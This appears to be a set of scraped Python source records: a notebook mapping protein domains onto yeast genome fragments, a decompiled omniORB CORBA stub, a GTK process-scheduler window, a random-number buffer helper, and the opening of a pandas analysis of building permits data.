'itemRgb', 'blockCount', 'blockSizes', 'blockStarts'], axis=1)\nannotations.head()\n\n\n# In[8]:\n\n\n# Merging the domains dataset with the annotations dataset to align domains to their genomic coordinates\ndomains_genomic = pd.merge(domains, annotations, left_on='Gene locus', right_on='name').drop('name', axis=1)\ndomain_start = (domains_genomic['alignment start'] * 3) + domains_genomic['start']\ndomain_end = (domains_genomic['alignment end'] * 3) + domains_genomic['start']\ndomains_genomic['domain start'] = domain_start\ndomains_genomic['domain end'] = domain_end\ndomains_genomic.head()\n\n\n# In[9]:\n\n\n# Making a dataset in BED format of domains and their genomic coordinates, to use for intersecting with fragments later\ndomain_bed = pd.DataFrame()\ndomain_bed['chrom'] = domains_genomic['chrom']\ndomain_bed['domStart'] = domains_genomic['domain start']\ndomain_bed['domEnd'] = domains_genomic['domain end']\ndomain_bed = pybedtools.BedTool.from_dataframe(domain_bed)\ndomain_bed.head()\n\n\n# In[10]:\n\n\n# Loading the FRAGMENT dataset as a BedTool\nfragments = pybedtools.BedTool('pacbio-190731-facs-assign.bed')\nfragments.head()\n\n\n# In[11]:\n\n\n# Let x be an adjustable parameter to determine the amount of overlap we require a fragment to have with a domain to consider them as a match\nx = .75\n\n\n# In[12]:\n\n\n# Using the intersect tool to find overlap between fragments and domains, returning the result as a dataframe\nfragment_domains = fragments.intersect(domain_bed, f=x, wo=True, nonamecheck=True).to_dataframe().drop('thickStart', axis=1)\nfragment_domains.columns = ['chrom', 'fragStart', 'fragEnd', 'barcode', 'score', 'strand', 'domStart', 'domEnd', 'overlap']\nfragment_domains.head()\n\n\n# In[13]:\n\n\n# Merging the fragment_domains dataframe with the domains dataset to add more information about the domains\nfragment_domains = pd.merge(fragment_domains, domains_genomic, left_on=['chrom', 'domStart', 'domEnd'], right_on=['chrom', 'domain start', 'domain end'])\nfragment_domains = fragment_domains.drop(['strand_y', 'domain start', 'domain end'], axis=1)\ncols = fragment_domains.columns.values\ncols[5] = 'strand'\ncols[15] = 'geneStart'\ncols[16] = 'geneEnd'\nfragment_domains.columns = cols\nfragment_domains.head()\n\n\n# In[14]:\n\n\n# Save the fragment_domains dataset as a 
CSV file\nfragment_domains.to_csv('fragment_domains.csv')\n\n\n# In[15]:\n\n\n# A function that takes in rows from the fragment_domain dataset and returns the coordinate for the protein start of the fragment\ndef findProteinStart(row):\n if row['strand'] == '+':\n end = (row['fragEnd'] - row['geneStart'] + 1) // 3\n dist = (row['fragEnd'] - row['fragStart']) // 3\n return end - dist\n elif row['strand'] == '-':\n dist = (row['geneEnd'] - row['fragStart'] + 1) // 3\n tot_dist = (row['geneEnd'] - row['geneStart']) // 3\n return tot_dist - dist\n \n# A function that takes in rows from the fragment_domain dataset after finding the proteinStarts and returns the coordinate for the \n# protein end of the fragment\ndef findProteinEnd(row):\n return row['proteinStart'] + ((row['fragEnd'] - row['fragStart']) // 3)\n\n\n# In[16]:\n\n\n# Applying the functions above to find the protein coordinates of each fragment\nfragment_domains['proteinStart'] = fragment_domains.apply(findProteinStart, axis=1)\nfragment_domains['proteinEnd'] = fragment_domains.apply(findProteinEnd, axis=1)\nfragment_domains = fragment_domains[['chrom','fragStart','fragEnd','proteinStart','proteinEnd','barcode','score','strand','domStart','domEnd','overlap',\n 'seq id','alignment start','alignment end','hmm acc','hmm name','Gene locus','geneStart','geneEnd']]\nfragment_domains.head()\n\n\n# In[17]:\n\n\n# Sorting the fragments BED\nfrags_sorted = fragments.sort()\nfrags_sorted.head()\n\n\n# In[18]:\n\n\n# Picking the most sequenced fragments out of identical fragments\nfrags_sorted = frags_sorted.to_dataframe()\nfrags_sorted.columns = ['chrom','start','stop','barcode','score','strand']\n\nfrags_sorted = frags_sorted.sort_values('score', ascending=False).drop_duplicates(['chrom','start','stop']).sort_index()\nfrags_sorted = pybedtools.BedTool.from_dataframe(frags_sorted)\nfrags_sorted.head()\n\n\n# In[19]:\n\n\n# Intersecting the fragments with themselves to find 90% similar fragments\nfrags_intersected = frags_sorted.intersect(frags_sorted, wao=True, f=.9, r=True, s=True, sorted=True, nonamecheck=True)\nfrags_intersected.head()\n\n\n# In[20]:\n\n\n# Selecting \nfrags_intersected_df = frags_intersected.to_dataframe(names=['chrom A','start A','end A','barcode A','score A','strand A','chrom B','start B','end B','barcode B','score B','strand B','overlap'])\nfrags_intersected_collapsed = frags_intersected_df.sort_values('score B',ascending=False).drop_duplicates(['chrom A', 'start A','end A']).drop_duplicates(['chrom B','start B','end B']).sort_index()\nfrags_intersected_collapsed.head()\n\n\n# In[21]:\n\n\nfrags_collapsed = frags_intersected_collapsed.iloc[:,np.arange(6,12)]\nfrags_collapsed.columns = ['chrom','start','end','barcode','score','strand']\nfrags_collapsed.head()\n\n\n# In[22]:\n\n\n# Merging our frags_clustered dataset with the fragment_domains dataset to map domain information onto our clustered fragments\nfrag_domain_collapsed = pd.merge(frags_collapsed, fragment_domains, left_on=['barcode'],\n right_on=['barcode'], how='left')\nfrag_domain_collapsed = frag_domain_collapsed.drop(['strand_y','score_y','chrom_y','fragStart','fragEnd'], axis=1)\nfrag_domain_collapsed\n\n\n# In[23]:\n\n\n#This seemed to add some rows; checking that the additional rows are because some fragments contained more than one domain\npd.concat(g for _, g in frag_domain_collapsed.groupby(\"barcode\") if len(g) > 1).head()\n\n\n# In[24]:\n\n\n# Loading the joint fragment-mle-peak dataset to map mle peak data onto our frag_domain_collapsed dataset 
\nmlep = pd.read_csv('joint-frag-mle-peak.csv')\nmlep.head()\n\n\n# In[25]:\n\n\n# Functions that process fragment data from the mlep dataset and returns its individual components (chromosome, start, end, strand)\ndef fragChrom(row):\n return re.search(\"chr\\d*\", row['frag']).group()\n\ndef fragStart(row):\n return int(re.search(\":\\d*\", row['frag']).group()[1:])\n\ndef fragEnd(row):\n return int(re.search(\"-\\d*\", row['frag']).group()[1:])\n\ndef fragStrand(row):\n return re.search(\"\\(.\\)\", row['frag']).group()\n\n\n# In[26]:\n\n\nmlep['chrom'] = mlep.apply(fragChrom, axis=1)\nmlep['start'] = mlep.apply(fragStart, axis=1)\nmlep['end'] = mlep.apply(fragEnd, axis=1)\nmlep['strand'] = mlep.apply(fragStrand, axis=1)\nmlep = mlep.drop('frag', axis=1)\nmlep\n\n\n# In[27]:\n\n\n# Merging the frag_domain_collapsed dataset with our mlep dataset to map on mlep data to our fragments\nfrag_domain_mlep = pd.merge(frag_domain_collapsed, mlep, left_on=['chrom_x','start','end'], right_on=['chrom','start','end'], how='left')\nfrag_domain_mlep = frag_domain_mlep.drop('strand', axis=1).dropna(subset=['mlePeak'])\nfrag_domain_mlep\n\n\n# In[28]:\n\n\nfrag_domain_mlep.to_csv('frag_domain_mlep.csv')\n\n\n# In[29]:\n\n\n# Finding the occurence of domains in the frag_domain_mlep dataset\ndomain_occurence_groups = frag_domain_mlep.groupby(['hmm name'])\ndomain_occurence = pd.DataFrame()\ndomain_occurence['domain'] = domain_occurence_groups.groups\ndomain_occurence['count'] = domain_occurence_groups.size()\ndomain_occurence = domain_occurence.reset_index().drop('index', axis=1)\ndomain_occurence.sort_values('count', ascending=False).head()\n\n\n# In[30]:\n\n\ndef mannwhitney(row):\n domain = row['domain']\n with_domain = frag_domain_mlep.loc[frag_domain_mlep['hmm name'] == domain]\n wo_domain = frag_domain_mlep.loc[frag_domain_mlep['hmm name'] != domain]\n return stats.mannwhitneyu(with_domain['mlePeak'], wo_domain['mlePeak'], alternative='two-sided')\n\n\n# In[31]:\n\n\ndomains_totest = domain_occurence.loc[domain_occurence['count'] >= 2].reset_index()\ntests = pd.DataFrame(domains_totest.apply(mannwhitney, axis=1).tolist())\ndomain_tests = domains_totest.join(tests).drop('index', axis=1)\ndomain_tests\n\n\n# In[34]:\n\n\ndef get_mlep(row):\n domain = row['domain']\n frag = frag_domain_mlep.loc[frag_domain_mlep['hmm name'] == domain]\n return np.mean(frag['mlePeak'])\n\n\n# In[35]:\n\n\nvalids = domain_tests.loc[domain_tests['pvalue'] <= .05]\nmleps = valids.apply(get_mlep, axis=1)\nvalids['mlePeak'] = mleps\nvalids = valids.sort_values('mlePeak', axis=0)\nvalids\n\n\n# In[36]:\n\n\nvalids.reset_index().to_csv('domain_mleps.csv')\n\n\n# In[37]:\n\n\n# Dropping duplicated fragments based on their start, end, and strand\nfrags_full = fragments.to_dataframe()\nfrags_full = frags_full.drop_duplicates(['start', 'end', 'strand'])\nfrags_full.shape\n\n\n# In[38]:\n\n\n# Turning the fragments dataframe into a BedTool for intersecting below\nfrags_full_bed = pybedtools.BedTool.from_dataframe(frags_full)\nfrags_full_bed.head()\n\n\n# In[39]:\n\n\n# Loading the ANNOTATED GENOME dataset as a dataframe\nannotations = pybedtools.BedTool('saccharomyces_cerevisiae.bed').to_dataframe()\nannotations = annotations.drop(['score', 'thickStart', 'thickEnd', 'itemRgb', 'blockCount', 'blockSizes', 'blockStarts'], axis=1)\nannotations_bed = pybedtools.BedTool.from_dataframe(annotations)\nannotations.head()\n\n\n# In[40]:\n\n\n# Using the intersect tool to attach gene coordinates onto the fragment dataset\nfrags_coordinates = 
frags_full_bed.intersect(annotations_bed, wo=True, nonamecheck=True).to_dataframe()\nfrags_coordinates.columns = ['chrom', 'fragStart', 'fragEnd', 'barcode', 'score', 'strand', 'chrom2', 'geneStart', 'geneEnd', 'geneName', 'strand2', 'overlap']\nfrags_coordinates = frags_coordinates.drop(['chrom2', 'strand2'], axis=1)\nprint(frags_coordinates.shape)\nfrags_coordinates.head()\n\n\n# In[41]:\n\n\n# Applying findProteinStart and findProteinEnd functions to attach protein coordinates onto frags_collapsed_coordinates\nfrags_coordinates['proteinStart'] = frags_coordinates.apply(findProteinStart, axis=1)\nfrags_coordinates['proteinEnd'] = frags_coordinates.apply(findProteinEnd, axis=1)\nfrags_coordinates.head()\n\n\n# In[42]:\n\n\nfrags_coordinates.to_csv('fragment-protein-coordinates_updatedALL.csv')\n\n\n# In[43]:\n\n\nmlep.head()\n\n\n# In[54]:\n\n\n# Merging the frag_domain_collapsed dataset with our mlep dataset to map on mlep data to our fragments\nfrags_coord_mlep = pd.merge(frags_coordinates, mlep, left_on=['chrom','fragStart','fragEnd'], right_on=['chrom','start','end'], how='left')\n#frags_coord_mlep_NA = frags_coord_mlep\nfrags_coord_mlep = frags_coord_mlep.dropna(subset=['mlePeak'])\nfrags_coord_mlep.shape\n\n\n# In[55]:\n\n\nfrags_coord_mlep.to_csv('frags_coordinates_mlep.csv')\nfrags_coord_mlep_NA.to_csv('frags_coordinates_NAmlep.csv')\n\n","sub_path":"fragment_domains_Pfam.py","file_name":"fragment_domains_Pfam.py","file_ext":"py","file_size_in_byte":11990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415044481","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: ./CosTimerEvent_idl.py\n# Compiled at: 2018-07-20 10:03:27\n# Size of source mod 2**32: 9940 bytes\nimport omniORB, _omnipy\nfrom omniORB import CORBA, PortableServer\n_0_CORBA = CORBA\n_omnipy.checkVersion(4, 2, __file__, 1)\ntry:\n property\nexcept NameError:\n\n def property(*args):\n pass\n\n\nimport TimeBase_idl\n_0_TimeBase = omniORB.openModule('TimeBase')\n_0_TimeBase__POA = omniORB.openModule('TimeBase__POA')\nimport CosTime_idl\n_0_CosTime = omniORB.openModule('CosTime')\n_0_CosTime__POA = omniORB.openModule('CosTime__POA')\nimport CosEventComm_idl\n_0_CosEventComm = omniORB.openModule('CosEventComm')\n_0_CosEventComm__POA = omniORB.openModule('CosEventComm__POA')\n__name__ = 'CosTimerEvent'\n_0_CosTimerEvent = omniORB.openModule('CosTimerEvent', '/tmp/corba/omni/share/idl/omniORB/COS/CosTimerEvent.idl')\n_0_CosTimerEvent__POA = omniORB.openModule('CosTimerEvent__POA', '/tmp/corba/omni/share/idl/omniORB/COS/CosTimerEvent.idl')\n_0_CosTimerEvent.TTAbsolute = omniORB.EnumItem('TTAbsolute', 0)\n_0_CosTimerEvent.TTRelative = omniORB.EnumItem('TTRelative', 1)\n_0_CosTimerEvent.TTPeriodic = omniORB.EnumItem('TTPeriodic', 2)\n_0_CosTimerEvent.TimeType = omniORB.Enum('IDL:omg.org/CosTimerEvent/TimeType:1.0', (_0_CosTimerEvent.TTAbsolute, _0_CosTimerEvent.TTRelative, _0_CosTimerEvent.TTPeriodic))\n_0_CosTimerEvent._d_TimeType = (\n omniORB.tcInternal.tv_enum, _0_CosTimerEvent.TimeType._NP_RepositoryId, 'TimeType', _0_CosTimerEvent.TimeType._items)\n_0_CosTimerEvent._tc_TimeType = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimeType)\nomniORB.registerType(_0_CosTimerEvent.TimeType._NP_RepositoryId, _0_CosTimerEvent._d_TimeType, _0_CosTimerEvent._tc_TimeType)\n_0_CosTimerEvent.ESTimeSet = omniORB.EnumItem('ESTimeSet', 
0)\n_0_CosTimerEvent.ESTimeCleared = omniORB.EnumItem('ESTimeCleared', 1)\n_0_CosTimerEvent.ESTriggered = omniORB.EnumItem('ESTriggered', 2)\n_0_CosTimerEvent.ESFailedTrigger = omniORB.EnumItem('ESFailedTrigger', 3)\n_0_CosTimerEvent.EventStatus = omniORB.Enum('IDL:omg.org/CosTimerEvent/EventStatus:1.0', (_0_CosTimerEvent.ESTimeSet, _0_CosTimerEvent.ESTimeCleared, _0_CosTimerEvent.ESTriggered, _0_CosTimerEvent.ESFailedTrigger))\n_0_CosTimerEvent._d_EventStatus = (\n omniORB.tcInternal.tv_enum, _0_CosTimerEvent.EventStatus._NP_RepositoryId, 'EventStatus', _0_CosTimerEvent.EventStatus._items)\n_0_CosTimerEvent._tc_EventStatus = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_EventStatus)\nomniORB.registerType(_0_CosTimerEvent.EventStatus._NP_RepositoryId, _0_CosTimerEvent._d_EventStatus, _0_CosTimerEvent._tc_EventStatus)\n_0_CosTimerEvent.TimerEventT = omniORB.newEmptyClass()\n\nclass TimerEventT(omniORB.StructBase):\n _NP_RepositoryId = 'IDL:omg.org/CosTimerEvent/TimerEventT:1.0'\n\n def __init__(self, utc, event_data):\n self.utc = utc\n self.event_data = event_data\n\n\n_0_CosTimerEvent.TimerEventT = TimerEventT\n_0_CosTimerEvent._d_TimerEventT = (omniORB.tcInternal.tv_struct, TimerEventT, TimerEventT._NP_RepositoryId, 'TimerEventT', 'utc', omniORB.typeMapping['IDL:omg.org/TimeBase/UtcT:1.0'], 'event_data', omniORB.tcInternal.tv_any)\n_0_CosTimerEvent._tc_TimerEventT = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimerEventT)\nomniORB.registerType(TimerEventT._NP_RepositoryId, _0_CosTimerEvent._d_TimerEventT, _0_CosTimerEvent._tc_TimerEventT)\ndel TimerEventT\n_0_CosTimerEvent._d_TimerEventHandler = (\n omniORB.tcInternal.tv_objref, 'IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0', 'TimerEventHandler')\nomniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0'] = _0_CosTimerEvent._d_TimerEventHandler\n_0_CosTimerEvent.TimerEventHandler = omniORB.newEmptyClass()\n\nclass TimerEventHandler:\n _NP_RepositoryId = _0_CosTimerEvent._d_TimerEventHandler[1]\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n _nil = CORBA.Object._nil\n\n\n_0_CosTimerEvent.TimerEventHandler = TimerEventHandler\n_0_CosTimerEvent._tc_TimerEventHandler = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimerEventHandler)\nomniORB.registerType(TimerEventHandler._NP_RepositoryId, _0_CosTimerEvent._d_TimerEventHandler, _0_CosTimerEvent._tc_TimerEventHandler)\nTimerEventHandler._d__get_status = ((), (omniORB.typeMapping['IDL:omg.org/CosTimerEvent/EventStatus:1.0'],), None)\nTimerEventHandler._d_time_set = ((), (omniORB.tcInternal.tv_boolean, omniORB.typeMapping['IDL:omg.org/CosTime/UTO:1.0']), None)\nTimerEventHandler._d_SetTimer = (\n (\n omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimeType:1.0'], omniORB.typeMapping['IDL:omg.org/CosTime/UTO:1.0']), (), None)\nTimerEventHandler._d_cancel_timer = ((), (omniORB.tcInternal.tv_boolean,), None)\nTimerEventHandler._d_set_data = ((omniORB.tcInternal.tv_any,), (), None)\n\nclass _objref_TimerEventHandler(CORBA.Object):\n _NP_RepositoryId = TimerEventHandler._NP_RepositoryId\n\n def __init__(self, obj):\n CORBA.Object.__init__(self, obj)\n\n def _get_status(self, *args):\n return self._obj.invoke('_get_status', _0_CosTimerEvent.TimerEventHandler._d__get_status, args)\n\n status = property(_get_status)\n\n def time_set(self, *args):\n return self._obj.invoke('time_set', _0_CosTimerEvent.TimerEventHandler._d_time_set, args)\n\n def SetTimer(self, *args):\n return self._obj.invoke('SetTimer', 
_0_CosTimerEvent.TimerEventHandler._d_SetTimer, args)\n\n def cancel_timer(self, *args):\n return self._obj.invoke('cancel_timer', _0_CosTimerEvent.TimerEventHandler._d_cancel_timer, args)\n\n def set_data(self, *args):\n return self._obj.invoke('set_data', _0_CosTimerEvent.TimerEventHandler._d_set_data, args)\n\n\nomniORB.registerObjref(TimerEventHandler._NP_RepositoryId, _objref_TimerEventHandler)\n_0_CosTimerEvent._objref_TimerEventHandler = _objref_TimerEventHandler\ndel TimerEventHandler\ndel _objref_TimerEventHandler\n__name__ = 'CosTimerEvent__POA'\n\nclass TimerEventHandler(PortableServer.Servant):\n _NP_RepositoryId = _0_CosTimerEvent.TimerEventHandler._NP_RepositoryId\n _omni_op_d = {'_get_status':_0_CosTimerEvent.TimerEventHandler._d__get_status, \n 'time_set':_0_CosTimerEvent.TimerEventHandler._d_time_set, 'SetTimer':_0_CosTimerEvent.TimerEventHandler._d_SetTimer, 'cancel_timer':_0_CosTimerEvent.TimerEventHandler._d_cancel_timer, 'set_data':_0_CosTimerEvent.TimerEventHandler._d_set_data}\n\n\nTimerEventHandler._omni_skeleton = TimerEventHandler\n_0_CosTimerEvent__POA.TimerEventHandler = TimerEventHandler\nomniORB.registerSkeleton(TimerEventHandler._NP_RepositoryId, TimerEventHandler)\ndel TimerEventHandler\n__name__ = 'CosTimerEvent'\n_0_CosTimerEvent._d_TimerEventService = (\n omniORB.tcInternal.tv_objref, 'IDL:omg.org/CosTimerEvent/TimerEventService:1.0', 'TimerEventService')\nomniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventService:1.0'] = _0_CosTimerEvent._d_TimerEventService\n_0_CosTimerEvent.TimerEventService = omniORB.newEmptyClass()\n\nclass TimerEventService:\n _NP_RepositoryId = _0_CosTimerEvent._d_TimerEventService[1]\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n _nil = CORBA.Object._nil\n\n\n_0_CosTimerEvent.TimerEventService = TimerEventService\n_0_CosTimerEvent._tc_TimerEventService = omniORB.tcInternal.createTypeCode(_0_CosTimerEvent._d_TimerEventService)\nomniORB.registerType(TimerEventService._NP_RepositoryId, _0_CosTimerEvent._d_TimerEventService, _0_CosTimerEvent._tc_TimerEventService)\nTimerEventService._d_register = (\n (\n omniORB.typeMapping['IDL:omg.org/CosEventComm/PushConsumer:1.0'], omniORB.tcInternal.tv_any), (omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0'],), None)\nTimerEventService._d_unregister = ((omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventHandler:1.0'],), (), None)\nTimerEventService._d_event_time = ((omniORB.typeMapping['IDL:omg.org/CosTimerEvent/TimerEventT:1.0'],), (omniORB.typeMapping['IDL:omg.org/CosTime/UTO:1.0'],), None)\n\nclass _objref_TimerEventService(CORBA.Object):\n _NP_RepositoryId = TimerEventService._NP_RepositoryId\n\n def __init__(self, obj):\n CORBA.Object.__init__(self, obj)\n\n def register(self, *args):\n return self._obj.invoke('register', _0_CosTimerEvent.TimerEventService._d_register, args)\n\n def unregister(self, *args):\n return self._obj.invoke('unregister', _0_CosTimerEvent.TimerEventService._d_unregister, args)\n\n def event_time(self, *args):\n return self._obj.invoke('event_time', _0_CosTimerEvent.TimerEventService._d_event_time, args)\n\n\nomniORB.registerObjref(TimerEventService._NP_RepositoryId, _objref_TimerEventService)\n_0_CosTimerEvent._objref_TimerEventService = _objref_TimerEventService\ndel TimerEventService\ndel _objref_TimerEventService\n__name__ = 'CosTimerEvent__POA'\n\nclass TimerEventService(PortableServer.Servant):\n _NP_RepositoryId = _0_CosTimerEvent.TimerEventService._NP_RepositoryId\n 
_omni_op_d = {'register':_0_CosTimerEvent.TimerEventService._d_register, \n 'unregister':_0_CosTimerEvent.TimerEventService._d_unregister, 'event_time':_0_CosTimerEvent.TimerEventService._d_event_time}\n\n\nTimerEventService._omni_skeleton = TimerEventService\n_0_CosTimerEvent__POA.TimerEventService = TimerEventService\nomniORB.registerSkeleton(TimerEventService._NP_RepositoryId, TimerEventService)\ndel TimerEventService\n__name__ = 'CosTimerEvent'\n__name__ = 'CosTimerEvent_idl'\n_exported_modules = ('CosTimerEvent', )","sub_path":"pycfiles/ans_python-0.3.1-py3-none-any/CosTimerEvent_idl.cpython-36.py","file_name":"CosTimerEvent_idl.cpython-36.py","file_ext":"py","file_size_in_byte":9582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378842061","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nfrom queue.queue import Queue\nfrom processes.NormalProcess import NormalProcess\n\nclass MainWindow(Gtk.Grid):\n def __init__(self, main_window):\n Gtk.Grid.__init__(self)\n self.main_window = main_window\n self.set_column_homogeneous = True\n\n self.queue = Queue()\n\n self.set_column_spacing(100)\n\n results_box = Gtk.ListBox()\n self.results_line = Gtk.ListBox()\n results_box.set_border_width(4)\n results_box.add(self.results_line)\n\n schedule_button = Gtk.Button('Schedule')\n schedule_button.connect('clicked', self.schedule)\n\n results_box.set_hexpand(True)\n results_box.add(schedule_button)\n\n self.attach(results_box, 0, 0, 1, 1)\n\n processes_box = Gtk.ListBox()\n self.process_lines = Gtk.ListBox()\n processes_box.add(self.process_lines)\n add_process_button = Gtk.Button('Add Process')\n add_process_button.connect('clicked', self.add_process_dialog)\n\n processes_box.set_hexpand(True)\n processes_box.set_border_width(5)\n processes_box.add(add_process_button)\n\n\n self.attach(processes_box, 3, 0, 1, 1)\n\n self.gantt_chart_box = Gtk.Box()\n self.gantt_chart_box.add(Gtk.Label('GANTT CHART GOES HERE'))\n self.attach(self.gantt_chart_box, 0, 1, 3, 1)\n\n\n def add_process_dialog(self, widget):\n self.dialog = Gtk.Dialog('Add Process', self.main_window)\n dialog_main_window = self.dialog.get_content_area()\n\n\n #Row for the text fields\n first_row = Gtk.Box(spacing=50)\n\n #Row for the Add and Cancel buttons\n second_row = Gtk.Box(spacing=50)\n\n #Row for validation information\n third_row = Gtk.Box(spacing=50)\n\n dialog_main_window.add(first_row)\n dialog_main_window.add(second_row)\n dialog_main_window.add(third_row)\n\n\n #Add the text fields to the first row\n self.process_name_input = Gtk.Entry()\n self.process_name_input.set_text('Process Name')\n\n self.process_time_input = Gtk.Entry()\n self.process_time_input.set_text('4')\n\n self.process_arrival_input = Gtk.Entry()\n self.process_arrival_input.set_text('1')\n\n first_row.pack_start(self.process_name_input, True, True, 0)\n first_row.pack_start(self.process_time_input, True, True, 0)\n first_row.pack_start(self.process_arrival_input, True, True, 0)\n\n\n #Add the buttons to the second row\n\n add_process_button = Gtk.Button('Add')\n add_process_button.connect('clicked', self.validate)\n\n cancel_button = Gtk.Button('Cancel')\n cancel_button.connect('clicked', self.cancel)\n second_row.pack_start(add_process_button, True, True, 0)\n second_row.pack_start(cancel_button, True, True, 0)\n\n\n #Add the validations row\n self.validations = Gtk.Label()\n third_row.pack_start(self.validations, True, True, 0)\n\n self.dialog.show_all()\n\n\n def 
cancel(self, widget):\n        self.dialog.close()\n\n\n    def validate(self, widget):\n        process_name = self.process_name_input.get_text()\n        process_time = self.process_time_input.get_text()\n        process_arrival = self.process_arrival_input.get_text()\n\n        try:\n            process_time = int(process_time)\n            process_arrival = int(process_arrival)\n            # the name must be non-empty and both numbers must be non-negative\n            if process_arrival < 0 or process_time < 0 or process_name == '':\n                raise ValueError('invalid input')\n            self.queue.addProcess(NormalProcess(process_name, process_arrival, process_time))\n        except Exception:\n            self.validations.set_label('The Process Name is Required, and the process arrival and Time should be non-negative integers')\n        else:\n            self.cancel(widget)\n            self.draw_queue()\n\n    def draw_queue(self):\n        for child in self.process_lines.get_children():\n            self.process_lines.remove(child)\n        for process in self.queue.processes:\n            t = str(process.name) + \" /// \" + str(process.arrival) + \" /// \" + str(process.time)\n            self.process_lines.add(Gtk.Label(t))\n        self.process_lines.show_all()\n\n\n    def schedule(self, widget):\n        pass\n\n\n    def draw_gantt(self, gantt_chart):\n        for child in self.gantt_chart_box.get_children():\n            self.gantt_chart_box.remove(child)\n\n        for process in gantt_chart.chart:\n            l = 'X'\n            if process is not None:\n                l = process.name\n            l = Gtk.Button(l)\n            self.gantt_chart_box.add(l)\n        self.gantt_chart_box.show_all()\n\n\n\n","sub_path":"schedulers/abstractions/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102187829","text":"import logging\nimport random\nimport asyncio\nfrom asyncio import Queue\n\n# Urandom is used as a backup if your quota is used up.\n# You however have a quota of 200K bits per day with a\n# max(start) of 1M bits.\n# So you probably won't run out\n\nurandom = random.SystemRandom()\n\nfrom .randomwrapy import *\n\nrandom_buffer = dict()\n\n_logger = logging.getLogger(__name__)\n\n\ndef urandom_list(count, max):\n    return [urandom.randint(1, max) for _ in range(count)]\n\n\nasync def populate_random_buffer(max, prefetch=None, use_true_random=True):\n    \"\"\"\n    Populate the random_buffer with random numbers.\n\n    If the number is larger than 100, then urandom will be used.\n    \"\"\"\n\n    num = prefetch if prefetch is not None else 30\n\n    if use_true_random:\n        try:\n            _logger.info('TrueRandom: Fetching {} true Random numbers from 1 to {}'.format(num, max))\n            numbers = rnumlistwithreplacement(num, max, 1)\n        except NoQuotaError:\n            _logger.warning('TrueRandom: Daily quota has run out, using urandom instead')\n            numbers = urandom_list(num, max)\n    else:\n        numbers = urandom_list(num, max)\n\n    if str(max) not in random_buffer:\n        random_buffer[str(max)] = Queue()\n\n    queue = random_buffer[str(max)]\n    for value in numbers:\n        await queue.put(int(value))\n\n\ndef randint(max, use_true_random=True):\n    \"\"\"\n    Get a true random number.\n\n    If you will be getting a large number of random values, I\n    suggest calling prefetch with the amount of numbers\n    before collecting them.\n\n    The range is [1, max], all inclusive.\n\n    :param max: the (inclusive) max number to get\n    \"\"\"\n    index = str(max)\n\n    buf = random_buffer.get(index)\n\n    if buf is not None and use_true_random is True:\n        try:\n            ret = buf.get_nowait()\n        except asyncio.QueueEmpty:\n            ret = urandom_list(1, max)[0]\n    else:\n        ret = urandom_list(1, max)[0]\n\n    return ret, buf is None or buf.qsize() < 10\n","sub_path":"dice_roller/util/truerandom/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461640907","text":"import operator\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import Series,DataFrame\nfrom geneview.gwas import qqplot\n\ndb='Building_Permits.csv'\n# read the CSV file into a DataFrame\ndata=pd.read_csv(db,low_memory=False)\n#print(data.info())198900*43\n# define the two groups of attributes: nominal and numeric\nframe1=DataFrame(data,columns=['Permit Type Definition','Permit Number','Permit Creation Date','Block','Lot','Street Number',\n'Street Number Suffix','Street Name','Street Suffix','Unit','Unit Suffix','Description','Current Status'\n,'Current Status Date','Filed Date','Issued Date','Completed Date','First Construction Document Date',\n'Structural Notification','Voluntary Soft-Story Retrofit','Fire Only Permit','Permit Expiration Date',\n'Existing Use','Proposed Use','Plansets','TIDF Compliance','Existing Construction Type',\n'Existing Construction Type Description','Proposed Construction Type','Proposed Construction Type Description',\n'Site Permit','Supervisor District','Neighborhoods - Analysis Boundaries','Zipcode','Location'])\n\nframe2=DataFrame(data,columns=['Number of Existing Stories','Number of Proposed Stories','Estimated Cost','Revised Cost','Existing Units','Proposed Units'])\nname_value=['Number of Existing Stories','Number of Proposed Stories','Estimated Cost','Revised Cost','Existing Units','Proposed Units']\nprint(data.iloc[:10])\n# **Step 1. Data summary**\n#\n# for nominal attributes, report the frequency of each possible value with value_counts()\nfor i in range(35):\n    print('频数为:\\n',frame1.iloc[:,[i]].apply(pd.value_counts),'\\n')\n\n# for numeric attributes, report the max, min, mean, median, quartiles and the number of missing values\n# use describe() to get the max, min, mean, median and quartiles\nstatistics=frame2.describe()\n# count the missing values of the numeric attributes\nstatistics.loc['null']=data.shape[0]-statistics.loc['count']\nprint(statistics)\n\n# **Step 2. 
